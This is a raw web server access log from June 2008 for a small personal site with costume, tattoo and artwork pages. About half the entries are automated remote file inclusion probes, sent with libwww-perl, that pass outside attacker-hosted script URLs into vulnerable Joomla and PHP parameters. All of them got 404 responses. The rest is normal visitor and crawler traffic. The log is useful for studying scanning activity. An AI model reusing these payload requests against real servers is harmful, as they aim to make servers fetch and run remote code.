80.67.25.167 - - [22/Jun/2008:01:00:17 -0500] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 364 "-""libwww-perl/5.808"
72.29.92.223 - - [22/Jun/2008:01:00:36 -0500] "GET //secpay.inc.php?config%5Broot_dir%5D=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.19.74.194 - - [22/Jun/2008:01:01:34 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.elmosfire.com/lustpillen/osc/images/readme.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
207.58.151.211 - - [22/Jun/2008:01:02:02 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.810"
207.58.151.211 - - [22/Jun/2008:01:02:02 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
202.221.143.111 - - [22/Jun/2008:01:02:03 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
202.221.143.111 - - [22/Jun/2008:01:02:04 -0500] "GET /phphtml.php?htmlclass_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
202.221.143.111 - - [22/Jun/2008:01:02:05 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
202.221.143.111 - - [22/Jun/2008:01:02:05 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
87.253.213.4 - - [22/Jun/2008:01:02:35 -0500] "GET /logs/index2.php?x=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.253.213.4 - - [22/Jun/2008:01:02:35 -0500] "GET /index2.php?x=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
87.106.101.24 - - [22/Jun/2008:01:03:04 -0500] "GET /logs/errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.101.24 - - [22/Jun/2008:01:03:04 -0500] "GET /errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.128.131.80 - - [22/Jun/2008:01:04:24 -0500] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
62.128.131.80 - - [22/Jun/2008:01:04:24 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
89.108.68.56 - - [22/Jun/2008:01:06:36 -0500] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
89.108.68.56 - - [22/Jun/2008:01:06:36 -0500] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
89.108.68.56 - - [22/Jun/2008:01:07:47 -0500] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
89.108.68.56 - - [22/Jun/2008:01:07:48 -0500] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
190.34.160.226 - - [22/Jun/2008:01:07:57 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
190.34.160.226 - - [22/Jun/2008:01:07:57 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 344 "-""libwww-perl/5.805"
72.34.226.62 - - [22/Jun/2008:01:08:08 -0500] "GET /logs/access_log.1207785600//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
72.34.226.62 - - [22/Jun/2008:01:08:08 -0500] "GET //appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
72.34.226.62 - - [22/Jun/2008:01:08:08 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
87.253.213.4 - - [22/Jun/2008:01:09:12 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
87.253.213.4 - - [22/Jun/2008:01:09:13 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 344 "-""libwww-perl/5.79"
87.101.4.49 - - [22/Jun/2008:01:09:22 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.stuhlpfarrer.at/contenido/classes/safe.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
87.101.4.49 - - [22/Jun/2008:01:09:22 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.stuhlpfarrer.at/contenido/classes/safe.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
207.58.151.211 - - [22/Jun/2008:01:10:26 -0500] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 329 "-""libwww-perl/5.810"
207.58.151.211 - - [22/Jun/2008:01:10:26 -0500] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.810"
89.108.68.56 - - [22/Jun/2008:01:11:47 -0500] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
89.108.68.56 - - [22/Jun/2008:01:11:50 -0500] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
67.170.127.210 - - [22/Jun/2008:01:13:03 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
62.128.131.80 - - [22/Jun/2008:01:15:57 -0500] "GET /logs/My_eGallery/public/displayCategory.php?basepath=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
62.128.131.80 - - [22/Jun/2008:01:15:57 -0500] "GET /My_eGallery/public/displayCategory.php?basepath=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
74.53.178.146 - - [22/Jun/2008:01:16:47 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
74.53.178.146 - - [22/Jun/2008:01:16:48 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
89.108.68.56 - - [22/Jun/2008:01:17:10 -0500] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
89.108.68.56 - - [22/Jun/2008:01:17:11 -0500] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
87.106.18.76 - - [22/Jun/2008:01:18:43 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.106.18.76 - - [22/Jun/2008:01:18:48 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
67.19.74.194 - - [22/Jun/2008:01:21:48 -0500] "GET /logs/access_log.1207785600/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.elmosfire.com/lustpillen/osc/images/readme.txt? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
67.19.74.194 - - [22/Jun/2008:01:21:49 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.elmosfire.com/lustpillen/osc/images/readme.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
67.19.74.194 - - [22/Jun/2008:01:21:49 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.elmosfire.com/lustpillen/osc/images/readme.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.810"
63.227.6.151 - - [22/Jun/2008:01:22:23 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://www.ravensgard.org/gerekr/costume.html""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.1.4322)"
63.227.6.151 - - [22/Jun/2008:01:22:27 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.1.4322)"
63.227.6.151 - - [22/Jun/2008:01:22:27 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.1.4322)"
63.227.6.151 - - [22/Jun/2008:01:22:33 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.1.4322)"
63.227.6.151 - - [22/Jun/2008:01:22:37 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.1.4322)"
63.227.6.151 - - [22/Jun/2008:01:22:38 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.1.4322)"
63.227.6.151 - - [22/Jun/2008:01:22:47 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.1.4322)"
63.227.6.151 - - [22/Jun/2008:01:22:48 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.1.4322)"
63.227.6.151 - - [22/Jun/2008:01:22:49 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.1.4322)"
63.227.6.151 - - [22/Jun/2008:01:22:52 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.1.4322)"
63.227.6.151 - - [22/Jun/2008:01:22:56 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.1.4322)"
63.227.6.151 - - [22/Jun/2008:01:22:57 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.1.4322)"
63.227.6.151 - - [22/Jun/2008:01:23:01 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.1.4322)"
74.6.17.158 - - [22/Jun/2008:01:23:02 -0500] "GET /artwork/mirrors.htm HTTP/1.0" 200 1118 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.9.228.149 - - [22/Jun/2008:01:23:05 -0500] "GET //tools/errors.php?error=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
63.227.6.151 - - [22/Jun/2008:01:23:13 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.1.4322)"
62.210.113.58 - - [22/Jun/2008:01:24:42 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sir-ranulf.com/guestbook/mic.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
62.210.113.58 - - [22/Jun/2008:01:24:42 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sir-ranulf.com/guestbook/mic.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
65.98.70.18 - - [22/Jun/2008:01:24:47 -0500] "GET /logs//secpay.inc.php?config%5Broot_dir%5D=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.811"
65.98.70.18 - - [22/Jun/2008:01:24:50 -0500] "GET //secpay.inc.php?config%5Broot_dir%5D=http://www.dichotomy.com.au/tmp/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
74.6.17.158 - - [22/Jun/2008:01:24:57 -0500] "GET /artwork/jewelrybox.htm HTTP/1.0" 200 827 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.67.25.167 - - [22/Jun/2008:01:26:08 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.808"
74.6.17.158 - - [22/Jun/2008:01:26:13 -0500] "GET /artwork/mobiles.htm HTTP/1.0" 200 986 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.67.25.167 - - [22/Jun/2008:01:26:13 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.808"
74.6.17.158 - - [22/Jun/2008:01:26:37 -0500] "GET /artwork/paintings.htm HTTP/1.0" 200 2300 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.158 - - [22/Jun/2008:01:26:58 -0500] "GET /artwork/banners.htm HTTP/1.0" 200 3537 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.208.134 - - [22/Jun/2008:01:28:46 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.134 - - [22/Jun/2008:01:28:51 -0500] "GET /costume/costume2.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
89.149.241.207 - - [22/Jun/2008:01:29:38 -0500] "GET /logs//tools/errors.php?error=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
89.149.241.207 - - [22/Jun/2008:01:29:38 -0500] "GET //tools/errors.php?error=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.811"
207.36.232.125 - - [22/Jun/2008:01:31:09 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
207.36.232.125 - - [22/Jun/2008:01:31:09 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.sec6.biz/zen/images/id.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
74.6.17.158 - - [22/Jun/2008:01:31:44 -0500] "GET /artwork/music.htm HTTP/1.0" 200 577 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.17.158 - - [22/Jun/2008:01:33:06 -0500] "GET /artwork/dressers.htm HTTP/1.0" 200 1093 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
219.101.201.34 - - [22/Jun/2008:01:33:47 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:33:47 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:33:47 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:33:54 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:33:54 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:33:54 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:33:54 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:33:54 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:33:54 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:33:54 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:33:54 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:33:55 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:33:55 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:33:55 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:34:12 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:34:12 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:34:13 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:34:13 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:34:13 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:34:13 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:34:13 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:34:14 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:34:14 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:34:14 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:34:14 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:34:31 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:34:31 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:34:31 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
219.101.201.34 - - [22/Jun/2008:01:34:32 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; WPS; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
67.205.74.80 - - [22/Jun/2008:01:39:08 -0500] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
67.205.74.80 - - [22/Jun/2008:01:39:08 -0500] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
89.108.68.56 - - [22/Jun/2008:01:39:25 -0500] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.108.68.56 - - [22/Jun/2008:01:39:26 -0500] "GET /agendax/addevent.inc.php?agendax_path=http://www.team-orion.com/toptalk/ci_builders/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
